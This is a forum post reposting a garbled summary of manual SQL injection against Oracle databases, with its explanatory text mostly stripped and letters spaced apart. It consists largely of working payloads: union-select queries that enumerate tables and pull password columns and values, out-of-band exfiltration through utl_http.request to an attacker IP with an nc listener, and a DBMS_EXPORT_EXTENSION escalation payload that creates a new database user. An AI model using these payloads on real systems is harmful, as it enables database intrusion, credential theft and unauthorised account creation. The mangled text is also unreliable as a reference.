找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 8|回复: 0

[20843] 2017-08-07_oracle手工注入总结

[复制链接]

6万

主题

-6万

回帖

-54

积分

管理员

积分
-54
发表于 2025-1-18 21:17:34 | 显示全部楼层 |阅读模式
2017-08-07_oracle手工注入总结 o r a c l e   l e m o n   L e m o n S e c   2 0 1 7 - 0 8 - 0 7 1 . a n d   1 = 1   a n d   1 = 2 2 . o r a c l e / * M y S Q L - - O r a c l e M s S Q L ; M S S Q L O r a c l e a n d   e x i s t ( s e l e c t   *   f r o m   d u a l )                 a n d   ( s e l e c t   c o u n t ( * )   f r o m   u s e r _ t a b l e s ) < 0 - - d u a l u s e r _ t a b l e s o r a c l e O r a c l e 3 . ( 1 ) 使 o d e r   b y   N   8 o r a c l e n u l l
( 2 ) ( s e l e c t   b a n n e r   f r o m   s y s . v _ $ v e r s i o n   w h e r e   r o w n u m = 1 )         s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d   1 = 2   u n i o n   s e l e c t   1 , ' 2 ' , 3 , ( s e l e c t   b a n n e r   f r o m   s y s . v _ $ v e r s i o n   w h e r e   r o w n u m = 1 ) , 5 , ' 6 ' , 7 , n u l l   f r o m d u a l ( 1 ) #   a n d   1 = 2   u n i o n   s e l e c t   1 , 2 , ( s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1 ) , 4 , 5 , 6   f r o m   d u a l
#   , S Y S a n d   1 = 2   u n i o n   s e l e c t   1 , 2 , ( s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1   a n d   o w n e r > ' S Y S ' ) , 4 , 5 , 6   f r o m   d u a l s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d   1 = 2   u n i o n   s e l e c t   1 , ' 2 ' , 3 , ' 4 ' , 5 , ( s e l e c t   o w n e r   f r o m   a l l _ t a b l e s   w h e r e   r o w n u m = 1   a n d   o w n e r > ' S Y S ' ) , 7 , n u l l f r o m   d u a l
( 2 ) #   ( s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e   r o w n u m = 1 ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d   1 = 2   u n i o n   s e l e c t   1 , ' 2 ' , 3 , ' 4 ' , 5 , ( s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e   r o w n u m = 1 ) , 7 , n u l l f r o m   d u a l , , ( s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e   r o w n u m = 1   a n d   t a b l e _ n a m e > ' A Q $ _ I N T E R N E T _ A G E N T S ' ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d   1 = 2   u n i o n   s e l e c t   1 , ' 2 ' , 3 , ' 4 ' , 5 , ( s e l e c t   t a b l e _ n a m e   f r o m   u s e r _ t a b l e s   w h e r e   r o w n u m = 1   a n d t a b l e _ n a m e > ' A Q $ _ I N T E R N E T _ A G E N T S ' ) , 7 , n u l l   f r o m   d u a l
, ( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e   c o l u m n _ n a m e   l i k e   ' % p a s s % ' ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d   1 = 2   u n i o n   s e l e c t   1 , ' 2 ' , 3 , ' 4 ' , 5 , ( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e c o l u m n _ n a m e   l i k e   ' % p a s s % ' ) , 7 , n u l l   f r o m   d u a l ( 3 ) #       p s    
( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e   t a b l e _ n a m e = ' p s '   a n d   r o w n u m = 1 ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d   1 = 2   u n i o n   s e l e c t   1 , ' 2 ' , 3 , ' 4 ' , 5 , ( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e t a b l e _ n a m e = ' p s '   a n d   r o w n u m = 1 ) , 7 , n u l l   f r o m   d u a l ( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e   t a b l e _ n a m e = ' p s '   a n d   c o l u m n _ n a m e > ' i d '   a n d   r o w n u m = 1 ) s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d   1 = 2   u n i o n   s e l e c t   1 , ' 2 ' , 3 , ' 4 ' , 5 , ( s e l e c t   c o l u m n _ n a m e   f r o m   u s e r _ t a b _ c o l u m n s   w h e r e t a b l e _ n a m e = ' p s '   a n d   c o l u m n _ n a m e > ' i d '   a n d   r o w n u m = 1 ) , 7 , n u l l   f r o m   d u a l
( s e l e c t   " p a s s w o r d "   f r o m   " p s "   w h e r e   " i d " = 1 )   s e l e c t   *   f r o m   " p s "   w h e r e   " i d " = 2   a n d   1 = 2   u n i o n   s e l e c t   1 , ' 2 ' , 3 , ' 4 ' , 5 , ( s e l e c t   " p a s s w o r d "   f r o m   " p s "   w h e r e   " i d " = 1 ) , 7 , n u l l   f r o m   d u a l O r a c l e
                                    s e l e c t t a b l e _ n a m e f r o m u s e r _ t a b l e s ;   / /   s e l e c t t a b l e _ n a m e f r o m a l l _ t a b l e s ;   / /   s e l e c t t a b l e _ n a m e f r o m d b a _ t a b l e s ;   / / s e l e c t t a b l e _ n a m e f r o m d b a _ t a b l e s w h e r e o w n e r = ' '   u s e r _ t a b l e s t a b l e _ n a m e , t a b l e s p a c e _ n a m e , l a s t _ a n a l y z e d d b a _ t a b l e s o w e r , t a b l e _ n a m e , t a b l e s p a c e _ n a m e , l a s t _ a n a l y z e d a l l _ t a b l e s o w e r , t a b l e _ n a m e , t a b l e s p a c e _ n a m e , l a s t _ a n a l y z e d a l l _ o b j e c t s o w e r , o b j e c t _ n a m e , s u b o b j e c t _ n a m e , o b j e c t _ i d , c r e a t e d , l a s t _ d d l _ t i m e , t i m e s t a m p , s t a t u s     s e l e c t * f r o m u s e r _ t a b _ c o l u m n s w h e r e T a b l e _ N a m e =
                                          ' ' ; s e l e c t * f r o m a l l _ t a b _ c o l u m n s w h e r e T a b l e _ N a m e = ' ' ; s e l e c t * f r o m d b a _ t a b _ c o l u m n s w h e r e T a b l e _ N a m e = ' ' ;   u s e r _ t a b _ c o l u m n s t a b l e _ n a m e , c o l u m n _ n a m e , d a t a _ t y p e , d a t a _ l e n g t h , d a t a _ p r e c i s i o n , d a t a _ s c a l e , n u l l a b l e , c o l u m n _ i d   a l l _ t a b _ c o l u m n s   o w e r , t a b l e _ n a m e , c o l u m n _ n a m e , d a t a _ t y p e , d a t a _ l e n g t h , d a t a _ p r e c i s i o n , d a t a _ s c a l e , n u l l a b l e , c o l u m n _ i d   d b a _ t a b _ c o l u m n s o w e r , t a b l e _ n a m e , c o l u m n _ n a m e , d a t a _ t y p e , d a t a _ l e n g t h , d a t a _ p r e c i s i o n , d a t a _ s c a l e , n u l l a b l e , c o l u m n _ i d   s e l e c t * f r o m u s e r _ t a b _ c o m m e n t s u s e r _ t a b _ c o m m e n t s t a b l e _ n a m e , t a b l e _ t y p e , c o m m e n t s d b a _ t a b _ c o m m e n t s a l l _ t a b _ c o m m e n t s u s e r _ t a b _ c o m m e n t s o w e r  
          5 . O r a c l e O r a c l e ( 1 ) o r a c l e a n d   1 = 2   u n i o n   s e l e c t   ' n u l l ' , n u l l , n u l l , n u l l , n u l l , n u l l   f r o m   d u a l n u l l   n u l l n u l l ( 2 ) U T L _ H T T P o r a c l e u t l _ h t t p . r e q u e s t , w e b o r a c l e s y s t e m o r a c l e 使 #   U T L _ H T T P a n d   e x i s t ( s e l e c t   c o u n t ( * )   f r o m   a l l _ o b j e c t s   w h e r e   o b j e c t _ n a m e = ' U T L _ H T T P ' ) #   n c n c   - v v   - l   - p   8 9 8 9 #   a n d   u t l _ h t t p . r e q u e s t ( ' h t t p : / / a t t a c k e r - i p : p o r t ' | | ( S Q L   Q u e r y ) ) = 1 #   a n d   u t l _ h t t p . r e q u e s t ( ' h t t p : / / a t t a c k - i p : p o r t ' | | ( s e l e c t   b a n n e r   f r o m   s y s . v _   w h e r e   r o w n u m = 1 ) ) = 1 - - N C S Q L n c ( 3 ) O S w i n d o w o r a c l e w e b s y s t e m L i n u x r o o t w e b S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T . D O M A I N _ I N D E X _ T A B L E S ( ) S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T . D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S _ O U T P U T " . P U T ( : P 1 ) ; [ A t t a c k - C o m m a n d ] E N D ; - - ' , S Y S ' , 0 , ' 1 ' , 0 ) A t t a c k - C o m m a n d U T L _ H T T P ( 4 ) r u n C M D ( 5 ) a n d   ' 1 ' < > ' 2 ' | | ( s e l e c t S Y S . D B M S _ E X P O R T _ E X T E N S I O N . G E T . D O M A I N _ I N D E X _ T A B L E S ( ' F O O ' , ' B A R ' , ' D B M S _ O U T P U T " . P U T ( : P 1 ) ; E X E C U T E I M M E D I A T E   ' '   D E C L A R E   P R A G M A   A U T O N O M O U S _ T R A N S A C T I O N ; B E G I N   E X E C U T E   I M M E D I A T E   ' '   ' '   C r e a t e   U S E R   L e n g F I D E N T I F I E D   B Y   L e n g F   ' '   ' ' ; E N D ; - - ' , S Y S ' , 0 , ' 1 ' , 0 )   f r o m   d u a l ) a n d   1 < > ( s e l e c t   u s e r _ i d   f r o m   a l l _ u s e r s   w h e r e   u s e r n a m e = ' l e n g f ' )   s e l e c t * f r o m u s e r _ c o l _ c o m m e n t s u s e r _ c o l _ c o m m e n t s t a b l e _ n a m e , c o l u m n _ n a m e , c o m m e n t s d b a _ c o l _ c o m m e n t s a l l _ c o l _ c o m m e n t s u s e r _ c o l _ c o m m e n t s o w e r
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-2-2 21:07 , Processed in 0.488655 second(s), 30 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表